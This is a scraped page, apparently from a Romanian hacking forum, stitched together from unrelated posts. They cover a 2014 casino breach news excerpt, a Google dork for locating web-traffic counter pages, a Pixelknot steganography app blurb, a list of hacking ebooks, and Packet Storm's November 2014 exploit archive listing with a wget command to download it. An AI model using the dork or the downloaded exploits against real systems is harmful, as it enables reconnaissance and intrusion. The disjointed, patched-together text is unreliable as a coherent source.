on Windows system. A spokesperson for cybersecurity firm Dell SecureWorks, who was brought to clean up the after-damage caused to the company and determine its actual cause, denied to comment on the issue due to the policy made by the company not to discuss work done for a customer. Also, the company spokesman Ron Reese declined to comment on the details provided in the report published by Bloomberg, saying, "I'm not going to confirm anything that was speculated or written in the Bloomberg story." Via http://thehackernews.com/2014/12/las-vegas-casino-hacked.html

google dork: intitle:contor trafic web intitle:trafic web service intitle:statistici trafic web selectezi din 'Instrumente de cautare', tara Romania succes!

What is Pixelknot? Pixelknot is an Android application that allows users to hide short text-based messages in photographs and share them across trusted channels. Pixelknot is now available on the Google Play store, Amazon appstore, and also on our website and verifiable via the asc. What is Steganography? The practice of embedding secret messages into a piece of media so that no one, apart from the sender and intended recipient, know that the secret message exists. The newly developed algorithm F5 withstands visual and statistical attacks, yet it still offers a large steganographic capacity. F5 implements matrix encoding to improve the efficiency of embedding. Thus it reduces the number of necessary changes. F5 employs permutative straddling to uniformly spread out the changes over the whole steganogram. The Guardian steganography standard: we are working towards ensuring that the secret message in an image must: Have the original image appear, to the trained human eye, unedited. Have the bytes of the image appear, to a trained analyst, undistorted so much so as to arouse suspicion. Have the complete message be recoverable no matter how it is transmitted. Screenshots Features Have a secret that you want to share? Why not hide it in a picture? With Pixelknot, only your friends with the secret password can unlock your special message. Everyone else just sees a pretty picture. It’s a fun and easy way to share hidden messages without anyone knowing. Take those pixels, twist them in a knot, and see for yourself! ? DISGUISE YOUR MESSAGES: Pictures are public, the text is hidden inside. Even a trained eye will think the image is unedited. It’s security through obscurity! ? FOR YOUR EYES ONLY: Put a password on the secret message to make sure that no one can read it except the person it’s meant for. ? EASY IMAGE CHOOSER: You can use the camera to take photos, or just use photos you’ve already taken. ? INVISIBLE CHANGES: Even a trained analyst analyst shouldn’t be able to detect any message. The image bytes should seem undistorted. ? SHARE ACROSS PLATFORMS: Want to share the images over email, file sharing tools (like Dropbox & Sparkleshare), social media (like Google+ & Flickr) or directly through Bluetooth or NFC? Not a problem! The messages are still recoverable on the other side. We’ll have even more tools (like Facebook) working soon, so stay tuned! ? AD-FREE: We want your love, not your money. ? MATHEMATICALLY SECURE: We use the newly developed steganography algorithm F5 which implements matrix encoding to improve the efficiency of embedding and employs permutative straddling to uniformly spread out the changes over the whole steganogram. ? ATTACK RESISTANT: We’ve launched attacks on images with messages hidden in them using a specialized version of stegdetect, an automated tool for detecting steganographic content in images. In most cases, the pictures have been impervious to attack. We will be including detection in an upcoming version of the application so you can easily test it yourself! ? ARTIST FRIENDLY: The app features the work of Pablo Picasso. His painting “Girl before a Mirror” from March 1932, to be exact. We hope it inspires you to share beautiful imagery and wonderful ideas. ? WE SPEAK YOUR LANGUAGE: Or at least we try to. Don’t see your language? Join us and help translate the app: https://www.transifex.com/projects/p/pixelknot/ Download: https://guardianproject.info/wp-content/uploads/2013/04/pixelknot-qr1.png Source: https://guardianproject.info/apps/pixelknot/

lista cu cartile AndroidHackersHandbook.acsm AndroidProgrammingPushingLimi.acsm ArtofMemoryForensicsDetecting.acsm BeginningPHP53.acsm BrowserHackersHandbook.acsm BuildingPHPApplicationswithSy.acsm CEHCertifiedEthicalHackerVers.acsm CEH-Handbook-v1.9.pdf CEHv8-Exam-Blueprint-v1.1-17012012.pdf DesignforHackersReverseEngine.acsm GhostintheWiresByKevinMitnick.pdf Hacking Point of Sale.pdf HTMLandCSS.acsm Indy-in-Depth.pdf iOS7ProgrammingPushingLimits.acsm JavaScriptProgrammingPushingL.acsm LPIC1LinuxProfessionalInstitu.acsm [Megafileupload]Cybercrime legislation EV6 %281%29.pdf MicrosoftSQLServer2012Adminis.acsm PhotoshopCCBible.acsm ProfessionalMicrosoftSQLServe.acsm RealWorldSolutionsforDevelopi.acsm WebApplicationDefendersCookbo.acsm Wiley_-_CMS_Security_Handbook_[]_(2011)_en.PDF Windows7SecretsSecrets140.acsm Windows8Secrets.acsm WindowsPhone7Secrets.acsm WindowsServer2008R2Secrets.acsm WindowsVistaSecrets.acsm XDADevelopersAndroidHackersTo.acsm

This archive contains all of the 158 exploits added to Packet Storm in November, 2014. 1411-exploits# ls ahrareandeysheh-xss.txt openkm-xss.txt anchorcms-inject.txt openxchange-sql.txt android-appleak.txt ossec-escalate.txt android-escalate.txt paidmembershipspro-traversal.txt android-smsresend.txt pandorafms51-xss.txt androidwappushmanager-sql.txt pandora_fms_sqli.rb.txt apadanacms-sql.txt parsadevcms-xss.txt atlasaeon-xss.txt php-5x-bash-shellshock.txt booking-redirect.txt phpbbderegglobal-bypass.txt cchwolters-escalate.txt phpfoxadmin-xss.txt citrix_netscaler_soap_bof.rb.txt phpfusion70207-sql.txt cnilcookieviz-sqlxss.txt phpparselocale-doublefree.tgz CORE-2014-0009.txt phpsoundmsp-xss.txt CVE-2014-6352.rar piwigo260-sql.txt device42-creds.txt planetsourcecode-sqlxssshell.txt device42_ping_exec.rb.txt pmp-sql.txt device42_tracert_exec.rb.txt progressopenedge-traversal.txt digionline-shell.txt proticaret-sql.txt dlinkdap1360-xsrf.txt pwn.c dlinkdap1360-xssxsrf.txt robotstats-sql.txt dlinkdcs2103-traversal.txt robotstats-xss.txt dolibarrerpcrm-sql.txt SA-20141106-0.txt drupalvideowhisper-xss.txt safari8-dos.txt eleanorcms-redirect.txt samsung_knox_smdm_url.rb.txt ellislab-sql.txt scmp-xss.txt esotalkcms-xss.txt secuid0.advisory.CVE-2014-8727.txt exploiting_sudo_grace_period.pdf sliderrevshowbiz-shell.txt ExploitRemotingService-master.zip sniffit-escalate.txt fasthealth-redirect.txt softing-backdoor.txt flatnuke31x-xss.txt softing-xss.txt fluxbb-sql.txt springsharelibcal-xss.txt formalms-xss.txt STIC-2014-0426.txt glance-escalate.txt tcpdumpgeonet-dos.txt glibc-libmemusage-1x-2x.sh.txt tcpdumposlr-dos.txt glibc-libpcprofile-1x-2x.sh.txt tcpdump-output.txt gogslabel-sql.txt tinyserver119-disclose.txt gogsrepo-sql.txt vbulletin421-redirect.txt gogs-xss.txt videostube-sqlxssshell.txt googledoubleclick-redirect.txt visual_mining_netcharts_upload.rb.txt helpdezk-upload.txt VL-1048.txt hikvision_rtsp_bof.rb.txt VL-1347.txt ie8ms14035-useafterfree.txt VL-1351.txt ieolepreie11-exec.txt VL-1353.txt iftp-overflow.txt VL-936.txt ihex-poc.txt weatherchannel-xss.txt image-poc.txt websitebaker283-sqlxss.txt indiatimes-xss.txt whoswho-xsrf.txt ioslaves-validation.txt wp40-dos.txt ipboard347-sql.txt wpadmanager-redirect.txt jexperts-escalate.txt wpawpclassifieds-sqlxss.txt jexperts-xss.txt wpbulletproofsecurity-ssrfxsssql.txt joomlaeventbooking-xss.txt wpcleansimple-xss.txt joomlahdflv-download.txt wpcmdownloadmanager-exec.txt joomlahdflv-sql.txt wpdbbackup-bruteforce.txt joomlasef-xss.txt wphtml5mp3-disclosure.txt KIS-2014-13.txt wpsexysqueeze-xss.txt KL-001-2014-004.txt wpspclientdocumentmanager-sql.txt kmplayer391130-dos.txt wpsupportezzy-xss.txt koschtit-xss.txt wpwpdatatables-shell.txt lantronix-exec.txt wpwpdatatables-sql.txt maarchletterbox-sqlbypass.txt x3cms-xsrfxss.txt manageengineea-disclose.txt x7chat2_php_exec.rb.txt mantisbt_php_exec.rb.txt xcloner-execdisclosebypass.txt meomsitpit360-sqlexecupload.txt xepan-xsrf.txt minix-dos.tgz xoops256-sql.txt minix_inet_dos.c zoph-sqlxss.txt mit-redirect.txt ZSL-2014-5204.tgz monstra-bypass.txt ZSL-2014-5205.txt monstra-hrs.txt ZSL-2014-5206.txt mousemediascript160-xss.txt ZSL-2014-5207.txt mozillafirefox36-useafterfree.txt ZSL-2014-5208.txt ms14_064_ie_olerce.rb.txt ZSL-2014-5209.txt ms14_064_ole_code_execution.rb.txt ZSL-2014-5210.txt ms14_064_packager_python.rb.txt ZSL-2014-5211.tgz ms14_064_packager_run_as_admin.rb.txt zte831cii-xsrfxsshardcoded.txt msiis75-xss.txt ztezxdsi-insecure.txt mybb181-sqlxss.txt ztezxdsl831-xss.txt mybb-bypassexec.txt ztezxhnh108l-bypass.txt nibbleblog-xss.txt zxdsl831cii-xsrf.txt wget http://packetstorm.interhost.co.il/1411-exploits/1411-exploits.tgz Packet Storm New Exploits For November, 2014 ? Packet Storm